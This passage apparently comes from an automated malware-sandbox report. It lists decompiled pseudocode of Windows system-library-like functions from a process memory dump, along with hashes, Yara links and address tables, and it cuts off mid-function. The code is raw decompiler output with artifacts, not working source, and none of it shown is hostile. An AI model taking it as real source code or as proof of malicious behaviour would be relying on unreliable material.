                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                • Instruction ID: 4a409dc30cc207b3455d29da9eef0f48864f7b382a6d0fba186863a66702c16d
                                                                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                • Instruction Fuzzy Hash: FE510231E04245DFDB24CF68C8907EEBBB1AF45318F1891A9CB4597381D375BA89D741
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB740D, Relevance: .1, Instructions: 141COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 84%
                                                                                                                                			E04FB740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04F3D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04F2F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04F04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04F04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04F2F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04F04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                                                0x04fb740d
                                                                                                                                0x04fb740d
                                                                                                                                0x04fb7412
                                                                                                                                0x04fb7413
                                                                                                                                0x04fb7416
                                                                                                                                0x04fb7418
                                                                                                                                0x04fb741c
                                                                                                                                0x04fb741f
                                                                                                                                0x04fb7422
                                                                                                                                0x04fb7422
                                                                                                                                0x04fb7428
                                                                                                                                0x04fb742a
                                                                                                                                0x04fb742a
                                                                                                                                0x04fb7451
                                                                                                                                0x04fb7432
                                                                                                                                0x04fb744f
                                                                                                                                0x04fb744f
                                                                                                                                0x00000000
                                                                                                                                0x04fb7434
                                                                                                                                0x04fb7438
                                                                                                                                0x04fb7443
                                                                                                                                0x04fb7517
                                                                                                                                0x04fb7517
                                                                                                                                0x04fb751a
                                                                                                                                0x04fb7535
                                                                                                                                0x04fb7520
                                                                                                                                0x04fb7527
                                                                                                                                0x04fb752c
                                                                                                                                0x04fb7531
                                                                                                                                0x04fb7533
                                                                                                                                0x00000000
                                                                                                                                0x04fb7533
                                                                                                                                0x00000000
                                                                                                                                0x04fb7531
                                                                                                                                0x04fb754b
                                                                                                                                0x04fb754f
                                                                                                                                0x04fb755c
                                                                                                                                0x04fb755c
                                                                                                                                0x04fb755f
                                                                                                                                0x04fb7560
                                                                                                                                0x04fb7561
                                                                                                                                0x04fb7562
                                                                                                                                0x04fb7563
                                                                                                                                0x04fb7568
                                                                                                                                0x04fb756a
                                                                                                                                0x04fb756c
                                                                                                                                0x04fb756d
                                                                                                                                0x04fb756d
                                                                                                                                0x04fb756f
                                                                                                                                0x04fb7572
                                                                                                                                0x04fb7574
                                                                                                                                0x04fb7577
                                                                                                                                0x04fb757c
                                                                                                                                0x04fb757f
                                                                                                                                0x00000000
                                                                                                                                0x04fb7551
                                                                                                                                0x04fb7551
                                                                                                                                0x04fb7551
                                                                                                                                0x04fb7553
                                                                                                                                0x04fb7553
                                                                                                                                0x04fb7449
                                                                                                                                0x04fb7449
                                                                                                                                0x04fb744c
                                                                                                                                0x04fb744c
                                                                                                                                0x00000000
                                                                                                                                0x04fb744c
                                                                                                                                0x04fb7443
                                                                                                                                0x04fb750e
                                                                                                                                0x04fb7514
                                                                                                                                0x04fb7514
                                                                                                                                0x04fb7455
                                                                                                                                0x04fb7469
                                                                                                                                0x04fb746d
                                                                                                                                0x00000000
                                                                                                                                0x04fb7473
                                                                                                                                0x04fb7473
                                                                                                                                0x04fb7476
                                                                                                                                0x04fb7480
                                                                                                                                0x04fb7484
                                                                                                                                0x04fb748e
                                                                                                                                0x04fb7493
                                                                                                                                0x04fb7493
                                                                                                                                0x04fb7496
                                                                                                                                0x04fb7499
                                                                                                                                0x04fb74a1
                                                                                                                                0x04fb74b1
                                                                                                                                0x04fb74b5
                                                                                                                                0x00000000
                                                                                                                                0x04fb74bb
                                                                                                                                0x04fb74c1
                                                                                                                                0x04fb74c1
                                                                                                                                0x04fb74c4
                                                                                                                                0x04fb74c5
                                                                                                                                0x04fb74c6
                                                                                                                                0x04fb74c7
                                                                                                                                0x04fb74c8
                                                                                                                                0x04fb74cd
                                                                                                                                0x00000000
                                                                                                                                0x04fb74d3
                                                                                                                                0x04fb74d3
                                                                                                                                0x04fb74d6
                                                                                                                                0x04fb74d8
                                                                                                                                0x04fb74db
                                                                                                                                0x04fb74dd
                                                                                                                                0x04fb74e0
                                                                                                                                0x04fb74e7
                                                                                                                                0x04fb74ee
                                                                                                                                0x04fb74ee
                                                                                                                                0x04fb74f4
                                                                                                                                0x04fb74f9
                                                                                                                                0x00000000
                                                                                                                                0x04fb74fb
                                                                                                                                0x04fb74fb
                                                                                                                                0x04fb74fd
                                                                                                                                0x04fb7500
                                                                                                                                0x04fb7503
                                                                                                                                0x04fb7505
                                                                                                                                0x04fb7505
                                                                                                                                0x04fb74f9
                                                                                                                                0x00000000
                                                                                                                                0x04fb74cd
                                                                                                                                0x04fb74b5
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                • Instruction ID: f638e79bc13b1e48a20be91b6001c255abdb8549760552c668ff8700dc56deab
                                                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                • Instruction Fuzzy Hash: 4B518B71600606EFDB15DF15C980A96BBF5FF86304F14C0AAE9089F251E371F946CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F12990, Relevance: .1, Instructions: 133COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 97%
                                                                                                                                			E04F12990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4fbff00);
				E04F3D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4ec1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04F2E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4ec1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04F651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4ec166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04F12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04EF6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04F12C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04EFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04F12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04F12C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04F12ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04F3D0D1(_t62);
				goto L28;
			}





















                                                                                                                                0x04f12990
                                                                                                                                0x04f12992
                                                                                                                                0x04f12997
                                                                                                                                0x04f129a3
                                                                                                                                0x04f129a6
                                                                                                                                0x04f129ab
                                                                                                                                0x04f129ad
                                                                                                                                0x04f129b2
                                                                                                                                0x04f55c80
                                                                                                                                0x04f129b8
                                                                                                                                0x04f129b8
                                                                                                                                0x04f129bb
                                                                                                                                0x04f129c0
                                                                                                                                0x04f129c5
                                                                                                                                0x04f129c6
                                                                                                                                0x04f129c6
                                                                                                                                0x04f129cb
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f129cd
                                                                                                                                0x04f129d0
                                                                                                                                0x04f129d9
                                                                                                                                0x04f129db
                                                                                                                                0x04f129dd
                                                                                                                                0x04f12a7f
                                                                                                                                0x04f12a84
                                                                                                                                0x04f12a87
                                                                                                                                0x04f12a89
                                                                                                                                0x04f55ca1
                                                                                                                                0x04f55ca3
                                                                                                                                0x00000000
                                                                                                                                0x04f12a8f
                                                                                                                                0x04f12a8f
                                                                                                                                0x00000000
                                                                                                                                0x04f12a8f
                                                                                                                                0x00000000
                                                                                                                                0x04f129e3
                                                                                                                                0x04f129e3
                                                                                                                                0x04f129e3
                                                                                                                                0x00000000
                                                                                                                                0x04f129e3
                                                                                                                                0x04f129dd
                                                                                                                                0x00000000
                                                                                                                                0x04f129db
                                                                                                                                0x04f129e6
                                                                                                                                0x04f129e9
                                                                                                                                0x04f129eb
                                                                                                                                0x04f129ed
                                                                                                                                0x04f129f3
                                                                                                                                0x04f129f5
                                                                                                                                0x04f129f8
                                                                                                                                0x04f129fa
                                                                                                                                0x04f12a97
                                                                                                                                0x04f12a9a
                                                                                                                                0x04f12a9d
                                                                                                                                0x04f12add
                                                                                                                                0x00000000
                                                                                                                                0x04f12a9f
                                                                                                                                0x04f12aa2
                                                                                                                                0x04f12aa5
                                                                                                                                0x04f12aa8
                                                                                                                                0x04f12aab
                                                                                                                                0x04f55cab
                                                                                                                                0x04f55caf
                                                                                                                                0x04f55cc5
                                                                                                                                0x04f55cda
                                                                                                                                0x04f55cdc
                                                                                                                                0x04f55cdf
                                                                                                                                0x04f55ce5
                                                                                                                                0x00000000
                                                                                                                                0x04f55ceb
                                                                                                                                0x04f55ced
                                                                                                                                0x04f55cee
                                                                                                                                0x00000000
                                                                                                                                0x04f55cee
                                                                                                                                0x04f55cb1
                                                                                                                                0x04f55cb4
                                                                                                                                0x04f55cb9
                                                                                                                                0x04f55cbb
                                                                                                                                0x00000000
                                                                                                                                0x04f55cbd
                                                                                                                                0x04f55cbd
                                                                                                                                0x00000000
                                                                                                                                0x04f55cbd
                                                                                                                                0x04f55cbb
                                                                                                                                0x04f12ab1
                                                                                                                                0x04f12ab1
                                                                                                                                0x04f12ac4
                                                                                                                                0x04f12ac6
                                                                                                                                0x04f12ac6
                                                                                                                                0x00000000
                                                                                                                                0x04f12ac6
                                                                                                                                0x04f12aab
                                                                                                                                0x00000000
                                                                                                                                0x04f12a00
                                                                                                                                0x04f12a09
                                                                                                                                0x04f12a0e
                                                                                                                                0x04f12a21
                                                                                                                                0x04f12a24
                                                                                                                                0x04f12a35
                                                                                                                                0x04f12a3a
                                                                                                                                0x04f12a3d
                                                                                                                                0x04f12a42
                                                                                                                                0x04f12a59
                                                                                                                                0x04f12a59
                                                                                                                                0x04f12a5c
                                                                                                                                0x04f12a5f
                                                                                                                                0x04f12a5f
                                                                                                                                0x04f129fa
                                                                                                                                0x04f129f3
                                                                                                                                0x04f12a64
                                                                                                                                0x04f12a64
                                                                                                                                0x04f12a6b
                                                                                                                                0x04f12a6b
                                                                                                                                0x04f12a6d
                                                                                                                                0x04f12a72
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3b193314e4c495ed9510ed1446888232ebf3cc9daaf952b5d76093fa454607ac
                                                                                                                                • Instruction ID: 71d7159ecf6c7c7cf02a784ff1cb72d2e43dd871b7d3735670a5472beb64eb78
                                                                                                                                • Opcode Fuzzy Hash: 3b193314e4c495ed9510ed1446888232ebf3cc9daaf952b5d76093fa454607ac
                                                                                                                                • Instruction Fuzzy Hash: 97513871A00209EFDF25DF99C880ADEBBB5FF48714F168096E914AB260D335A953DF90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F14D3B, Relevance: .1, Instructions: 131COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 78%
                                                                                                                                			E04F14D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4fdd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04F2FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4fd7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04F2B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04F04620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04EECCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04F2B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04F2F380(_t67 + 0xc, 0x4ec5138, 0x10) == 0) {
								 *0x4fd60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04F14F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04F14E70(0x4fd86b0, 0x4f15690, 0, 0) != 0) {
					_t46 = E04EECCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                                                0x04f14d3b
                                                                                                                                0x04f14d4d
                                                                                                                                0x04f14d53
                                                                                                                                0x04f14d58
                                                                                                                                0x04f14d65
                                                                                                                                0x04f14d6c
                                                                                                                                0x04f14d71
                                                                                                                                0x04f14d77
                                                                                                                                0x04f14d7f
                                                                                                                                0x04f14d8c
                                                                                                                                0x04f14d8e
                                                                                                                                0x04f14dad
                                                                                                                                0x04f14db0
                                                                                                                                0x04f14db7
                                                                                                                                0x04f14db8
                                                                                                                                0x04f14db9
                                                                                                                                0x04f14dba
                                                                                                                                0x04f14dbb
                                                                                                                                0x04f14dc1
                                                                                                                                0x04f14dc8
                                                                                                                                0x04f14dcc
                                                                                                                                0x04f14dd5
                                                                                                                                0x04f14dde
                                                                                                                                0x04f14ddf
                                                                                                                                0x04f14de0
                                                                                                                                0x04f14de1
                                                                                                                                0x04f14de6
                                                                                                                                0x04f14de7
                                                                                                                                0x04f14de9
                                                                                                                                0x04f14df3
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56c7c
                                                                                                                                0x04f56c8a
                                                                                                                                0x04f56c8a
                                                                                                                                0x04f56c9d
                                                                                                                                0x04f56ca7
                                                                                                                                0x04f56cac
                                                                                                                                0x04f56cb2
                                                                                                                                0x04f56cb9
                                                                                                                                0x00000000
                                                                                                                                0x04f56cbf
                                                                                                                                0x04f56cbf
                                                                                                                                0x00000000
                                                                                                                                0x04f56cbf
                                                                                                                                0x04f56cb9
                                                                                                                                0x04f14dfb
                                                                                                                                0x04f56ccf
                                                                                                                                0x04f56cd3
                                                                                                                                0x04f14e32
                                                                                                                                0x04f14e39
                                                                                                                                0x04f56ce0
                                                                                                                                0x04f56cf2
                                                                                                                                0x04f56cf2
                                                                                                                                0x04f56ce0
                                                                                                                                0x04f14e3f
                                                                                                                                0x04f14e41
                                                                                                                                0x04f14e51
                                                                                                                                0x04f14e51
                                                                                                                                0x04f14e03
                                                                                                                                0x04f14e03
                                                                                                                                0x04f14e09
                                                                                                                                0x04f14e0f
                                                                                                                                0x04f14e57
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f14e1b
                                                                                                                                0x04f14e30
                                                                                                                                0x04f14e5b
                                                                                                                                0x04f14e5b
                                                                                                                                0x00000000
                                                                                                                                0x04f14e30
                                                                                                                                0x04f14e11
                                                                                                                                0x04f14e11
                                                                                                                                0x04f14e16
                                                                                                                                0x00000000
                                                                                                                                0x04f14e16
                                                                                                                                0x04f14e01
                                                                                                                                0x00000000
                                                                                                                                0x04f14e01
                                                                                                                                0x04f14da5
                                                                                                                                0x04f56c6b
                                                                                                                                0x00000000
                                                                                                                                0x04f14dab
                                                                                                                                0x04f14dab
                                                                                                                                0x00000000
                                                                                                                                0x04f14dab

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 26663a0ab5372b72d98e78f19e2a06a313cb637db7dfc8acf128c89972b0333e
                                                                                                                                • Instruction ID: 795c7463fdea73330c76d164eb655f29777ee0300568316badd097c755d89dee
                                                                                                                                • Opcode Fuzzy Hash: 26663a0ab5372b72d98e78f19e2a06a313cb637db7dfc8acf128c89972b0333e
                                                                                                                                • Instruction Fuzzy Hash: 9A41B171B40318AFEB21DF24CD80F6AB7BAEB85714F0440A9E9499B290D774FD46CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F14BAD, Relevance: .1, Instructions: 131COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E04F14BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4fdd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04EECC50(_t86);
					L11:
					return E04F2B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4fd8504
				E04F02280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04F2FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04F2B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04F04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04EECCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4fd8504
								E04EFFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04F14F49(_t77, _t84);
							}
							goto L8;
						}
